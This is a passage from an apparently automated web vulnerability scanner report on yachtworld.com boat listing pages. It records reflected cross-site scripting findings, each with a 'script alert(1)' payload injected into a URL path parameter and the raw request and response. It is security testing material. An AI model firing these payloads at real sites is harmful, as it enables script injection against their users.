Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:58 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:57 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
el="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmingtone7c2f"><script>alert(1)</script>22176e24a46/NC/United-States&boat_id=2305157">
...[SNIP]...

3.98. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad86"><script>alert(1)</script>1a4dcae2003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NCfad86"><script>alert(1)</script>1a4dcae2003/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:24 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:23 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NCfad86"><script>alert(1)</script>1a4dcae2003/United-States&boat_id=2305157">
...[SNIP]...

3.99. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 833dd"><script>alert(1)</script>f4cd42b8d3c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States833dd"><script>alert(1)</script>f4cd42b8d3c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:44 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:44 GMT
